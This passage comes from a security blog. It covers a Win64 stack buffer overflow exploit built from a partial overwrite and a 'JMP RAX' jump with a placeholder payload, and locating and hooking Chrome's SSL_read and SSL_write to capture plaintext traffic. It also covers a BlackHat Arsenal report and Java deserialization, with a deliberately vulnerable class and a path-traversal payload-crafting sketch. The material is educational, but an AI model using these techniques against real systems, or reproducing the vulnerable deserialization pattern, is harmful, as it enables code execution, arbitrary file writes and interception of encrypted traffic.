call <consolex64.strcpy>      ; Call strcpy function
add rsp,58                    ; Cleanup the stack
ret                           ; Return from function

Let’s modify the Copy function call to the following:

Copy("1111111122222222333333334444444455555555");

The string has 40 bytes, and it will fit in our buffer (however, please note that strcpy will also place a NULL byte after our string, but this way it is easier to see the buffer on the stack).

This is how the stack will look like after the strcpy function call:

000000000012FE90 000007FEEE7E5D98 ; Unused stack space
000000000012FE98 00000001400021C8 ; Unused stack space
000000000012FEA0 0000000000000000 ; Unused stack space
000000000012FEA8 00000001400021C8 ; Unused stack space
000000000012FEB0 3131313131313131 ; "11111111"
000000000012FEB8 3232323232323232 ; "22222222"
000000000012FEC0 3333333333333333 ; "33333333"
000000000012FEC8 3434343434343434 ; "44444444"
000000000012FED0 3535353535353535 ; "55555555"
000000000012FED8 0000000000000000 ; Unused stack space
000000000012FEE0 00000001400021A0 ; Unused stack space
000000000012FEE8 0000000140001030 ; Return address

As you can probably see, we need to add an extra 24 bytes to overwrite the return address: 16 bytes for the unused stack space and 8 bytes for the return address. Let’s modify the Copy function call to the following:

Copy("11111111222222223333333344444444555555556666666677777777AAAAAAAA");

This will overwrite the return address with “AAAAAAAA”.

NULL byte problem

In our case, a call to the “strcpy” function generates the vulnerability. What is important to understand is that “strcpy” stops copying data when it encounters the first NULL byte. For us, this means that we cannot have NULL bytes in our payload.

This is a problem for a simple reason: the addresses that we might use contain NULL bytes. For example, these are the addresses in my case:

0000000140001000 | 48 89 4C 24 08 | mov qword ptr ss:[rsp+8],rcx 
0000000140001005 | 48 83 EC 58    | sub rsp,58 
0000000140001009 | 48 8B 54 24 60 | mov rdx,qword ptr ss:[rsp+60] 
000000014000100E | 48 8D 4C 24 20 | lea rcx,qword ptr ss:[rsp+20] 
0000000140001013 | E8 04 0B 00 00 | call <consolex64.strcpy>
0000000140001018 | 48 83 C4 58    | add rsp,58 
000000014000101C | C3             | ret

If we wanted to proceed like in the 32 bits example, we would have to overwrite the return address with an address such as 000000014000101C, where there would be a “JMP RSP” instruction, and continue with our shellcode after this address. As you can see, this is not possible, because the address contains NULL bytes.

So, what can we do? We should find a workaround. A simple and useful trick that we can do is the following: we can partially overwrite the return address. So, instead of overwriting the whole 8 bytes of the address, we can overwrite only the last 4, 5 or 6 bytes. Let’s modify the function call to overwrite only the last 5 bytes, so we will just remove 3 “A”s from our payload. The function call will be the following:

Copy("11111111222222223333333344444444555555556666666677777777AAAAA");

Before the “RET” instruction, the stack will look like this:

000000000012FED8 3636363636363636 ; Part of our payload
000000000012FEE0 3737373737373737 ; Part of our payload
000000000012FEE8 0000004141414141 ; Return address

As you can see, we are able to specify a valid address, so we solved our first issue. However, since we cannot add anything else after this, as we need NULL bytes to have a valid address, how can we exploit this vulnerability?

Let’s take a look at the registers, maybe we can find an easy win. Here are the registers before the RET instruction:

Win64 registers

We can see that the RAX register holds the address where our payload is stored. This happens for a simple reason: strcpy copies the string into the buffer and returns the address of the buffer (its first argument). As we already know, the return value of a function call is placed in the RAX register, so we have access to our payload through RAX.

Now, our exploitation is simple:

  1. We have our payload address in RAX register
  2. We find a “JMP RAX” instruction
  3. We specify the address of that instruction as return address

We can easily find some “JMP RAX” instructions:

JMP RAX

We will take one of them, one that does not contain NULL bytes in the middle, and we can create the payload:

  1. 56 bytes of shellcode (required to reach the return address). We will use 0xCC (the INT 3 instruction, which is used to pause the execution of the program in the debugger)
  2. 4 bytes of return address, the “JMP RAX” instruction that we previously found (strcpy’s terminating NULL byte zeroes the fifth byte, and the upper bytes of the old return address are already zero)

This is how the function call will look like:

 Copy("\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC"
      "\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC"
      "\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC"
      "\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC"
      "\xF8\x0E\x7E\x77");

And we have control over the program.

However, please note that we have a small buffer and it might be difficult to find a good shellcode that fits in this space. Still, the purpose of the article was to find a way to exploit this vulnerability that can be easily understood.

Conclusion

Maybe this article did not cover a real-life situation, but it should be enough as a starting point in exploiting Stack Based Buffer Overflows on Windows 64 bits.

My recommendation is to compile a program like this one and try to exploit it yourself. You can download my simple Visual Studio 2017 project from here.

If you have any questions, please leave a comment here or use the contact email.

nytrosecurity

Hooking Chrome’s SSL functions

25 February 2018 at 23:49

The purpose of NetRipper is to intercept the functions that encrypt or decrypt data sent through the network and capture that data. This can be easily achieved for applications such as Firefox, where it is enough to find two DLL-exported functions, PR_Read and PR_Write, but it is way more difficult for Google Chrome, where the SSL_read and SSL_write functions are not exported.

The main problem for someone who wants to intercept such calls is that we cannot easily find these functions inside the huge chrome.dll file. So we have to find them manually in the binary. But how can we do it?

Chrome’s source code

In order to achieve our goal, the best starting point might be Chrome’s source code. We can find it here: https://cs.chromium.org/ . It allows us to easily search and navigate through the source code.

We should probably note from the beginning that Google Chrome uses boringssl, a fork of OpenSSL. This project is available in the Chromium source code here.

Now, we have to find the functions we need, SSL_read and SSL_write, and we can easily find them in the ssl_lib.cc file.

SSL_read:

int SSL_read(SSL *ssl, void *buf, int num) {
  int ret = SSL_peek(ssl, buf, num);
  if (ret <= 0) {
    return ret;
  }
  // TODO(davidben): In DTLS, should the rest of the record be discarded?  DTLS
  // is not a stream. See https://crbug.com/boringssl/65.
  ssl->s3->pending_app_data =
      ssl->s3->pending_app_data.subspan(static_cast<size_t>(ret));
  if (ssl->s3->pending_app_data.empty()) {
    ssl->s3->read_buffer.DiscardConsumed();
  }
  return ret;
}

SSL_write:

int SSL_write(SSL *ssl, const void *buf, int num) {
  ssl_reset_error_state(ssl);

  if (ssl->do_handshake == NULL) {
    OPENSSL_PUT_ERROR(SSL, SSL_R_UNINITIALIZED);
    return -1;
  }

  if (ssl->s3->write_shutdown != ssl_shutdown_none) {
    OPENSSL_PUT_ERROR(SSL, SSL_R_PROTOCOL_IS_SHUTDOWN);
    return -1;
  }

  int ret = 0;
  bool needs_handshake = false;
  do {
    // If necessary, complete the handshake implicitly.
    if (!ssl_can_write(ssl)) {
      ret = SSL_do_handshake(ssl);
      if (ret < 0) {
        return ret;
      }
      if (ret == 0) {
        OPENSSL_PUT_ERROR(SSL, SSL_R_SSL_HANDSHAKE_FAILURE);
        return -1;
      }
    }

    ret = ssl->method->write_app_data(ssl, &needs_handshake,
                                      (const uint8_t *)buf, num);
  } while (needs_handshake);
  return ret;
}

Why are we looking at the code? It is simple: in the binary we might find things that we can also find in the source code, such as strings or specific values.

I actually discovered the basic idea that I will present here some time ago, probably here, but I will cover all the aspects in order to make sure anyone will be able to find the functions, not only for Chrome, but also for other tools such as Putty or WinSCP.

SSL_write function

Even if the SSL_read function does not provide useful information, we can start with SSL_write, where we can see something that looks useful:

OPENSSL_PUT_ERROR(SSL, SSL_R_UNINITIALIZED);

Here is the OPENSSL_PUT_ERROR macro:

// OPENSSL_PUT_ERROR is used by OpenSSL code to add an error to the error
// queue.
#define OPENSSL_PUT_ERROR(library, reason) \
 ERR_put_error(ERR_LIB_##library, 0, reason, __FILE__, __LINE__)

Some things are very useful:

  • ERR_put_error is a function call
  • reason is the second parameter, and in our case SSL_R_UNINITIALIZED has the value 226 (0xE2)
  • __FILE__ is the actual filename, full path of ssl_lib.cc
  • __LINE__ is the current line number in ssl_lib.cc file

All this information can help us to find the SSL_write function. Why?

  • We know it is a function call, so the parameters (such as reason, __FILE__ and __LINE__) will be placed on the stack (x86)
  • We know the reason (0xE2)
  • We know the __FILE__ (ssl_lib.cc)
  • We know the __LINE__ (1060 or 0x424 in this version)

But what if a different version is used? The line numbers can be totally different. Well, in this case, we have to take a look at how Google Chrome uses BoringSSL.

We can find the specific version of Chrome here. For example, right now on x86 I have this version: Version 65.0.3325.181 (Official Build) (32-bit). We can find its source code here. Now, we have to find the BoringSSL code, but it looks like it is not there. However, the DEPS file is very useful, and we can extract some information from it:

vars = {
...
  'boringssl_git': 'https://boringssl.googlesource.com',
  'boringssl_revision': '94cd196a80252c98e329e979870f2a462cc4f402',

We can see that our Chrome version uses https://boringssl.googlesource.com to get BoringSSL and it uses this revision: 94cd196a80252c98e329e979870f2a462cc4f402. Based on this, we can get the exact code for BoringSSL right here. And this is the ssl_lib.cc file.

Now, let’s see which steps we have to take to get the SSL_write function address:

  1. Search for “ssl_lib.cc” filename in the read-only section of chrome.dll (.rdata)
  2. Get the full path and search for references
  3. Check all references to the string and find the right one based on “reason” and line number parameters

SSL_read function

It was not difficult to find the SSL_write function because there is an OPENSSL_PUT_ERROR call, but we do not have one in SSL_read. Let’s see how SSL_read works and follow it.

We can easily see that it calls SSL_peek:

int ret = SSL_peek(ssl, buf, num);

We can see that SSL_peek will call ssl_read_impl function:

int SSL_peek(SSL *ssl, void *buf, int num) {
  int ret = ssl_read_impl(ssl);
  if (ret <= 0) {
    return ret;
  }
...
}

And ssl_read_impl function is trying to help us:

static int ssl_read_impl(SSL *ssl) {
  ssl_reset_error_state(ssl);

  if (ssl->do_handshake == NULL) {
    OPENSSL_PUT_ERROR(SSL, SSL_R_UNINITIALIZED);
    return -1;
  }
...
}

We can search in the code and find out that the ssl_read_impl function is called in just two places, by the SSL_peek and SSL_shutdown functions, so it should be pretty easy to find SSL_peek. After we find SSL_peek, SSL_read is straightforward to find.

Chrome on 32 bits

Since we have the general idea about how we can find the functions, let’s find them.

I will use x64dbg but you can probably use any other debugger. We have to go to the “Memory” tab and find chrome.dll. We will need to do two things first:

  • Open the code section in the disassembler, so right click on “.text” and choose “Follow in Disassembler”
  • Open the read-only data section in the dump window, so right click on “.rdata” and choose “Follow in Dump”

Now we have to find the “ssl_lib.cc” string in the dump window, so right click inside the window, choose “Find Pattern” and search for our ASCII string. You should get a single result; double click it and go back until you find the full path of the ssl_lib.cc file. Right click the first byte of the full path, as shown in the screenshot below, and choose “Find References” to see where it is used (the OPENSSL_PUT_ERROR calls).

Found full path 32

It looks like we have multiple references, but we can take them one by one and find the right one. Here is the result.

Found multiple 32

Let’s go to the last one, for example, to see what it looks like.

6D44325C | 68 AD 03 00 00 | push 3AD |
6D443261 | 68 24 24 E9 6D | push chrome.6DE92424 | 6DE92424:"../../third_party/boringssl/src/ssl/ssl_lib.cc"
6D443266 | 6A 44          | push 44 |
6D443268 | 6A 00          | push 0 |
6D44326A | 6A 10          | push 10 |
6D44326C | E8 27 A7 00 FF | call chrome.6C44D998 |
6D443271 | 83 C4 14       | add esp,14 |

It looks exactly as we expected: a function call with five parameters. As you probably know, the parameters are pushed on the stack from right to left, and we have the following:

  1. push 3AD – The line number
  2. push chrome.6DE92424 – Our string, the file path
  3. push 44 – The reason
  4. push 0 – The parameter which is always 0
  5. push 10 – First parameter
  6. call chrome.6C44D998 – Call the ERR_put_error function
  7. add esp,14 – Clean the stack

However, 0x3AD represents line number 941, which is inside “ssl_do_post_handshake” so it is not what we need.

SSL_write

SSL_write has calls to this function on line numbers 1056 (0x420) and 1061 (0x425), so we will need to find the call to the function with a push 420 or push 425 at the beginning. Going through the results will take just a few seconds until we find it:

6BBA52D0 | 68 25 04 00 00 | push 425 |
6BBA52D5 | 68 24 24 E9 6D | push chrome.6DE92424 | 6DE92424:"../../third_party/boringssl/src/ssl/ssl_lib.cc"
6BBA52DA | 68 C2 00 00 00 | push C2 |
6BBA52DF | EB 0F          | jmp chrome.6BBA52F0 |
6BBA52E1 | 68 20 04 00 00 | push 420 |
6BBA52E6 | 68 24 24 E9 6D | push chrome.6DE92424 | 6DE92424:"../../third_party/boringssl/src/ssl/ssl_lib.cc"
6BBA52EB | 68 E2 00 00 00 | push E2 |
6BBA52F0 | 6A 00          | push 0 |
6BBA52F2 | 6A 10          | push 10 |
6BBA52F4 | E8 9F 86 8A 00 | call chrome.6C44D998 |

We can see here both function calls, with just a small mention that the first one is optimised. Now, we just have to go back until we find something that looks like the start of a function. While this might not always be the case for other functions, it should work in our case and we can easily find it by the classic function prologue:

6BBA5291 | 55    | push ebp |
6BBA5292 | 89 E5 | mov ebp,esp |
6BBA5294 | 53    | push ebx |
6BBA5295 | 57    | push edi |
6BBA5296 | 56    | push esi |

Let’s place a breakpoint at 6BBA5291 and see what happens when we use Chrome to browse some HTTPS website (to avoid issues, browse a website without SPDY or HTTP/2.0).

Here is an example of what we can get on the top of the stack when the breakpoint is triggered:

06DEF274 6A0651E8 return to chrome.6A0651E8 from chrome.6A065291
06DEF278 0D48C9C0 ; First parameter of SSL_write (pointer to SSL)
06DEF27C 0B3C61F8 ; Second parameter, the payload
06DEF280 0000051C ; Third parameter, payload size

If you right click the second parameter and select “Follow DWORD in Dump”, you should see the plain-text data, such as:

0B3C61F8 50 4F 53 54 20 2F 61 68 2F 61 6A 61 78 2F 72 65 POST /ah/ajax/re 
0B3C6208 63 6F 72 64 2D 69 6D 70 72 65 73 73 69 6F 6E 73 cord-impressions 
0B3C6218 3F 63 34 69 3D 65 50 6D 5F 66 48 70 72 78 64 48 ?c4i=ePm_fHprxdH

SSL_read

Let’s now find the SSL_read function. We should find the call to “OPENSSL_PUT_ERROR” from the ssl_read_impl function. This call is on line 962 (0x3C2). Let’s go again through the results and find it. Here it is:

6B902FAC | 68 C2 03 00 00 | push 3C2 |
6B902FB1 | 68 24 24 35 6C | push chrome.6C352424 | 6C352424:"../../third_party/boringssl/src/ssl/ssl_lib.cc"
6B902FB6 | 68 E2 00 00 00 | push E2 |
6B902FBB | 6A 00          | push 0 |
6B902FBD | 6A 10          | push 10 |
6B902FBF | E8 D4 A9 00 FF | call chrome.6A90D998 |

Now, we should find the beginning of the function, which should be easy. Right click the first instruction (push EBP), go to “Find references to” and “Selected Address(es)”.

Find ref to ssl_read_impl 32

We should find only one call to the function, which should come from SSL_peek. Find the first instruction of SSL_peek and repeat the same step. We should have only one result, which is the call to SSL_peek from SSL_read. So we got it.

6A065F52 | 55             | push ebp | ; SSL_read function
6A065F53 | 89 E5          | mov ebp,esp |
...
6A065F60 | 57             | push edi |
6A065F61 | E8 35 00 00 00 | call chrome.6A065F9B | ; Call SSL_peek

Let’s place a breakpoint; on a normal call, we can see the following:

06DEF338 6A065D8F return to chrome.6A065D8F from chrome.6A065F52
06DEF33C 0AF39EA0 ; First parameter of SSL_read, pointer to SSL
06DEF340 0D4D5880 ; Second parameter, the payload
06DEF344 00001000 ; Third parameter, payload length

Now, we should right click the second parameter and choose “Follow DWORD in Dump” before pressing the “Execute til return” button, in order to stop in the debugger at the end of the function, after the data was read into the buffer. We should be able to see the plain-text data in the Dump window, where we selected the payload.

0D4D5880 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D HTTP/1.1 200 OK. 
0D4D5890 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 69 .Content-Type: i 
0D4D58A0 6D 61 67 65 2F 67 69 66 0D 0A 54 72 61 6E 73 66 mage/gif..Transf

We managed to find it as well.

Conclusion

It might look difficult at the beginning, but as you can see, it is pretty easy if we follow the source code in the binary. This approach should work for most of the open-source applications.

As the x64 version would be very similar and the only difference would be the assembly code, it will not be detailed here.

However, please note that hooking these functions might result in unstable behaviour and possible crashes.

nytrosecurity

NetRipper at BlackHat Asia Arsenal 2018

31 March 2018 at 20:52

I had the opportunity to present NetRipper at BlackHat Asia Arsenal 2018 and it was amazing. As you probably know, BlackHat conferences have trainings, briefings (presentations), a vendor area and Arsenal. Arsenal is the perfect place for anyone who wants to present their open-source tool. It is organised by ToolsWatch and I totally recommend checking it out if you attend any BlackHat conference.

Arsenal

Since it was my first BlackHat conference, I did not know what to expect or how things would go. I knew that Arsenal presentations take place in booths (stations) in the vendor area, and this might look strange at first, but as soon as I saw it, I realised that it is perfect.

At BlackHat Asia, there are 6 Arsenal stations where 6 open-source tools are presented at the same time, each tool being presented for about two hours. This is followed by another round of 6 tools for another 2 hours, and so on, to the end of the day. This is what a station looks like:

DY3nx3vVQAAmx-v

You can find the list of tools here: https://www.blackhat.com/asia-18/arsenal.html

It is important to note that you will not see slides at Arsenal (or just a few). Arsenal is focused on the interaction between the speaker and the participants, and you will see a lot of demos. You go there to talk to people about their tools, ask them questions and see the tools in action. There is no time for slides (I used only one, with contact information and the GitHub page) and you can learn anything you want about each tool and even recommend new features and improvements.

DY82rOUVwAALJ1P

It will take just a few minutes to see each tool in action, so you will have enough time to see all of them. Take your time, as you might realise that these tools can really help you on your engagements.

Speakers

If you develop your own open-source tool, I suggest you apply to the Arsenal call for papers. The only issue is that you (or your company) have to cover the travel and hotel expenses, but it will be worth it.

Arsenal is one of the best places to show your project, to get real-time feedback and to find bugs during your demos (it happens, a lot).

You will have the opportunity to interact with a lot of people with different views: some of them might be very technical, some of them might not, but for sure, all of them will help you build a better tool.

You will also have the opportunity to interact with other Arsenal speakers, and you might find that your tools can do a good job together. Here is a photo with all (or most) of us:

IMG_8937

Also, like anyone working on a project in their free time, you might find Arsenal a very good motivation to build a powerful and stable tool. You will not want to go there with an unstable tool, of course.

Oh, and if this is not enough, you should also know that you will receive a Briefings pass as well, so you will also have the chance to see the presentations. And since a Briefings pass is not very cheap, this should encourage you to present.

Conclusion

BlackHat Arsenal is an amazing place, both for visitors and speakers. Even if the trip might cost some money (my company paid for mine), it is totally worth it. Oh, I almost forgot… Singapore is a really nice city to visit. 🙂

nytrosecurity

Understanding Java deserialization

30 May 2018 at 08:53

Some time ago I detailed PHP Object Injection vulnerabilities, and this post will get into the details of Java deserialization vulnerabilities. The concept is simple: developers use a feature of the programming language, serialization, to simplify their job, but they are not aware of the risks.

Java deserialization is a vulnerability similar to deserialization vulnerabilities in other programming languages. This class of vulnerabilities came to life in 2006; it became more common and more exploited, and it is now part of the OWASP Top 10 2017.

What is deserialization?

In order to understand deserialization (or unserialization), we need to understand first serialization.

Each application deals with data, such as user information (e.g. username, age), and uses it to perform different actions: run SQL queries, log it into files (be careful with GDPR) or just display it. Many programming languages offer the possibility to work with objects, so developers can group data and methods together in classes.

Serialization is the process of translating the application data (such as objects) into a binary format that can be stored or sent over the network, in order to be reused by the same or by another application, which will deserialize it as the reverse process.

The basic idea is that it is easy to create and reuse objects.

Serialization example

Let’s take a simple example of code to see how serialization works. We will serialize a simple String object.

import java.io.*;

public class Serial
{
    public static void main(String[] args)
    {
        String name = "Nytro";
        String filename = "file.bin";

        try
        {
            FileOutputStream file  = new FileOutputStream(filename);
            ObjectOutputStream out = new ObjectOutputStream(file);

            // Serialization of the "name" (String) object
            // Will be written to "file.bin"

            out.writeObject(name);

            out.close();
            file.close();
        }
        catch(Exception e)
        {
            System.out.println("Exception: " + e.toString());
        }
    }
}

We have the following:

  • A String (object) “name”, which we will serialize
  • A file name where we will write the serialized data (we will use FileOutputStream)
  • We call “writeObject” method to serialize the object (using ObjectOutputStream)
  • We clean up

As you can see, serialization is simple. Below is the content of the serialized data, the content of “file.bin” in hexadecimal format:

AC ED 00 05 74 00 05 4e 79 74 72 6f            ....t..Nytro

We can see the following:

  • Data starts with the binary “AC ED” – this is the “magic number” that identifies serialized data, so all serialized data will start with this value
  • Serialization protocol version “00 05”
  • We only have a String identified by “74”
  • Followed by the length of the string “00 05”
  • And, finally, our string

We can save this object on the file system, we can store it in a database, or we can even send it to another system over the network. To reuse it, we just need to deserialize it later, on the same system or on a different system and we should be able to fully reconstruct it. Of course, being a simple String, it’s not a big deal, but it can be any object.
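To verify this byte layout yourself, you can serialize the same string in memory and dump the result in hex. Below is a minimal, self-contained sketch (the HexDump class name is mine):

```java
import java.io.*;

public class HexDump
{
    // Serialize an object in memory and return its bytes as a hex string
    public static String serializeHex(Object obj) throws IOException
    {
        ByteArrayOutputStream buf = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(buf))
        {
            out.writeObject(obj);
        }
        StringBuilder sb = new StringBuilder();
        for (byte b : buf.toByteArray())
        {
            sb.append(String.format("%02X ", b));
        }
        return sb.toString().trim();
    }

    public static void main(String[] args) throws IOException
    {
        // Prints: AC ED 00 05 74 00 05 4E 79 74 72 6F
        System.out.println(serializeHex("Nytro"));
    }
}
```

Running it reproduces exactly the bytes shown above: the magic number, the protocol version, the TC_STRING marker, the length and the string itself.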

Let’s see now how easy it is to deserialize it:

String name;
String filename = "file.bin";

try
{
    FileInputStream file  = new FileInputStream(filename);
    ObjectInputStream in  = new ObjectInputStream(file);

    // Deserialization of the "name" (String) object
    // Will be read from "file.bin"

    name = (String)in.readObject();
    System.out.println(name);

    in.close();
    file.close();
}
catch(Exception e)
{
    System.out.println("Exception: " + e.toString());
}

We need the following:

  • A String variable (name) to store the reconstructed (deserialized) object
  • The file name where we can find the serialized data (using FileInputStream)
  • We call “readObject” to deserialize the object (using ObjectInputStream) and cast the returned Object to String
  • We clean up

By running this, we should be able to reconstruct the serialized object.

What can go wrong?

Let’s see what can happen if we want to do something useful with the serialization.

We can execute different actions as soon as the data is read from the serialized object. Let’s see a few theoretical examples of what developers might do during deserialization:

  • if we deserialize an “SQLConnection” object (e.g. with a ConnectionString), we can connect to the database
  • if we deserialize a “User” object (e.g. with a Username), we can retrieve user information from the database (by running some SQL queries)
  • if we deserialize a “LogFile” object (e.g. with Filename and Filecontent) we can restore the previously saved log data

In order to do something useful after deserialization, we need to implement a “readObject” method in the class we deserialize. Let’s take the “LogFile” example.

// Vulnerable class

class LogFile implements Serializable
{
   public String filename;
   public String filecontent;

  // Function called during deserialization

  private void readObject(ObjectInputStream in)
  {
     System.out.println("readObject from LogFile");

     try
     {
        // Unserialize data

        in.defaultReadObject();
        System.out.println("File name: " + filename + ", file content: \n" + filecontent);

        // Do something useful with the data
        // Restore LogFile, write file content to file name

        FileWriter file = new FileWriter(filename);
        BufferedWriter out = new BufferedWriter(file);

        System.out.println("Restoring log data to file...");
        out.write(filecontent);

        out.close();
        file.close();
     }
     catch (Exception e)
     {
         System.out.println("Exception: " + e.toString());
     }
   }
}

We can see the following:

  • implements Serializable – The class has to implement this interface to be serializable
  • filename and filecontent – Class variables, which should contain the “LogFile” data
  • readObject – The function that will be called during deserialization
  • in.defaultReadObject() – Function that performs the default deserialization -> will read the data from the file and set the values to our filename and filecontent variables
  • out.write(filecontent) – Our vulnerable class wants to do something useful, and it will restore the log file data (from filecontent) to a file on the disk (from filename)

So, what’s wrong here? A possible use case for this class is the following:

  1. A user logs in and executes some actions in the application
  2. The actions generate a user-specific log file, using this class
  3. The user has the possibility to download (serialize LogFile) their logged data
  4. The user has the possibility to upload (deserialize LogFile) their previously saved data

In order to work easier with serialization, we can use the following class to serialize and deserialize data from files:

class Utils
{
    // Function to serialize an object and write it to a file

    public static void SerializeToFile(Object obj, String filename)
    {
        try
        {
            FileOutputStream file = new FileOutputStream(filename);
            ObjectOutputStream out = new ObjectOutputStream(file);

            // Serialization of the object to file

            System.out.println("Serializing " + obj.toString() + " to " + filename);
            out.writeObject(obj);

            out.close();
            file.close();
        }
        catch(Exception e)
        {
            System.out.println("Exception: " + e.toString());
        }
    }

    // Function to deserialize an object from a file

    public static Object DeserializeFromFile(String filename)
    {
        Object obj = new Object();

        try
        {
            FileInputStream file = new FileInputStream(filename);
            ObjectInputStream in = new ObjectInputStream(file);

            // Deserialization of the object to file

            System.out.println("Deserializing from " + filename);
            obj = in.readObject();

            in.close();
            file.close();
        }
        catch(Exception e)
        {
            System.out.println("Exception: " + e.toString());
        }

        return obj;
    }
}

Let’s see how a serialized object looks. Below is the serialization of the object:

LogFile ob = new LogFile();
ob.filename = "User_Nytro.log";
ob.filecontent = "No actions logged";

String file = "Log.ser";

Utils.SerializeToFile(ob, file);

Here is the content (hex) of the Log.ser file:

AC ED 00 05 73 72 00 07 4C 6F 67 46 69 6C 65 D7 ¬í..sr..LogFile×
60 3D D7 33 3E BC D1 02 00 02 4C 00 0B 66 69 6C `=×3>¼Ñ...L..fil
65 63 6F 6E 74 65 6E 74 74 00 12 4C 6A 61 76 61 econtentt..Ljava
2F 6C 61 6E 67 2F 53 74 72 69 6E 67 3B 4C 00 08 /lang/String;L..
66 69 6C 65 6E 61 6D 65 71 00 7E 00 01 78 70 74 filenameq.~..xpt
00 11 4E 6F 20 61 63 74 69 6F 6E 73 20 6C 6F 67 ..No actions log
67 65 64 74 00 0E 55 73 65 72 5F 4E 79 74 72 6F gedt..User_Nytro
2E 6C 6F 67                                     .log

As you can see, it looks simple. We can see the class name, “LogFile”, “filename” and “filecontent” variable names and we can also see their values. However, it is important to note that there is no code, it is only the data.

Let’s dig into it to see what it contains:

  • AC ED -> We already discussed about the magic number
  • 00 05 -> And protocol version
  • 73 -> We have a new object (TC_OBJECT)
  • 72 -> Refers to a class description (TC_CLASSDESC)
  • 00 07 -> The length of the class name – 7 characters
  • 4C 6F 67 46 69 6C 65 -> Class name – LogFile
  • D7 60 3D D7 33 3E BC D1 -> Serial version UID – An identifier of the class. This value can be specified in the class, if not, it is generated automatically
  • 02 -> Flag mentioning that the class is serializable (SC_SERIALIZABLE) – a class can also be externalizable
  • 00 02 -> Number of variables in the class
  • 4C -> Type code/signature – class
  • 00 0B -> Length of the class variable – 11
  • 66 69 6C 65 63 6F 6E 74 65 6E 74 -> Variable name – filecontent
  • 74 -> A string (TC_STRING)
  • 00 12 -> Length of the class name string – 18 characters
  • 4C 6A 61 76 61 2F 6C 61 6E 67 2F 53 74 72 69 6E 67 3B -> Class name – Ljava/lang/String;
  • 4C -> Type code/signature – class
  • 00 08 -> Length of the class variable – 8
  • 66 69 6C 65 6E 61 6D 65 -> Variable name – filename
  • 71 -> It is a reference to a previous object (TC_REFERENCE)
  • 00 7E 00 01 -> Object reference ID. Referenced objects start from 0x7E0000
  • 78 -> End of block data for this object (TC_ENDBLOCKDATA)
  • 70 -> NULL reference, we finished the “class description”, the data will follow
  • 74 -> A string (TC_STRING)
  • 00 11 -> Length of the string – 17 characters
  • 4E 6F 20 61 63 74 69 6F 6E 73 20 6C 6F 67 67 65 64 -> The string – No actions logged
  • 74 -> A string (TC_STRING)
  • 00 0E -> Length of the string – 14 characters
  • 55 73 65 72 5F 4E 79 74 72 6F 2E 6C 6F 67 -> The string – User_Nytro.log

The protocol details are not important, but they might help if manually updating a serialized object is required.

Attack example

As you might expect, the issue happens during the deserialization process. Below is a simple example of deserialization.

LogFile ob = new LogFile();
String file = "Log.ser";

// Deserialization of the object

ob = (LogFile)Utils.DeserializeFromFile(file);

And here is the output:

Deserializing from Log.ser
readObject from LogFile
File name: User_Nytro.log, file content: No actions logged
Restoring log data to file...

What happens is pretty straightforward:

  1. We deserialize the “Log.ser” file (containing a serialized LogFile object)
  2. This will automatically call “readObject” method of “LogFile” class
  3. It will print the file name and the file content
  4. And it will create a file called “User_Nytro.log” containing “No actions logged” text

As you can see, an attacker will be able to write any file (depending on permissions) with any content on the system running the vulnerable application. It is not a directly exploitable Remote Command Execution, but it might be turned into one.
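For illustration, crafting such an input requires nothing more than serializing an attacker-controlled instance. Below is a self-contained sketch (the CraftPayload and Entry names are mine; in a real attack the class name and serialVersionUID would have to match the target’s LogFile class):

```java
import java.io.*;

public class CraftPayload
{
    // Minimal stand-in for the vulnerable class: the attacker fully
    // controls the field values that readObject will later trust
    static class Entry implements Serializable
    {
        public String filename;
        public String filecontent;
    }

    // Serialize an attacker-chosen filename/content pair to bytes
    public static byte[] craft(String path, String content) throws IOException
    {
        Entry e = new Entry();
        e.filename = path;        // e.g. a path traversal payload
        e.filecontent = content;  // arbitrary content to be written
        ByteArrayOutputStream buf = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(buf))
        {
            out.writeObject(e);
        }
        return buf.toByteArray();
    }

    public static void main(String[] args) throws IOException
    {
        byte[] payload = craft("../../evil.log", "attacker data");
        // Every payload starts with the AC ED magic number
        System.out.println((payload[0] & 0xFF) == 0xAC && (payload[1] & 0xFF) == 0xED);
    }
}
```

The point is that serialization puts no constraints on the field values; the only “validation” is whatever the deserializing code does with them afterwards.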

We need to understand a few important things:

  • Serialized objects do not contain code, they contain only data
  • The serialized object contains the class name of the serialized object
  • Attackers control the data, but not the code, meaning that the attack depends on what the code does with the data

It is important to note that readObject is not the only affected method. The readResolve, readExternal and readUnshared methods have to be checked as well. Oh, we should not forget XStream. And this is not the full list…

For black-box testing, it might be easy to find serialized objects by looking into the network traffic and trying to find the 0xAC 0xED bytes or the “rO0” base64-encoded prefix. If we do not have any information about the libraries on the remote system, we can just iterate through all ysoserial payloads and throw them at the application.
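These two markers are easy to check for programmatically. Below is a tiny detection sketch (the SerialDetect name is mine):

```java
import java.util.Base64;

public class SerialDetect
{
    // Returns true if the bytes start with the Java serialization
    // magic number AC ED followed by stream version 00 05
    public static boolean looksSerialized(byte[] data)
    {
        return data.length >= 4
            && (data[0] & 0xFF) == 0xAC && (data[1] & 0xFF) == 0xED
            && (data[2] & 0xFF) == 0x00 && (data[3] & 0xFF) == 0x05;
    }

    public static void main(String[] args)
    {
        // Base64 of bytes starting with AC ED 00 05 always starts with "rO0"
        byte[] raw = Base64.getDecoder().decode("rO0ABXQABU55dHJv");
        System.out.println(looksSerialized(raw)); // prints: true
    }
}
```

The base64 string above decodes to the serialized “Nytro” String from the first example, which is why it starts with “rO0”.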

But my readObject is safe

This might be the most common misconception regarding deserialization vulnerabilities. Any application doing deserialization is vulnerable as long as other vulnerable classes are in the class-path. This happens because, as we already discussed earlier, the serialized object contains a class name. Java will try to find the class specified in the serialized object in the class-path and load it.

One of the most important vulnerabilities was discovered in the well-known Apache Commons Collections library. If a vulnerable version of this library (or one of multiple other vulnerable libraries) is present on the system running the deserializing application, the deserialization vulnerability can result in remote command execution.

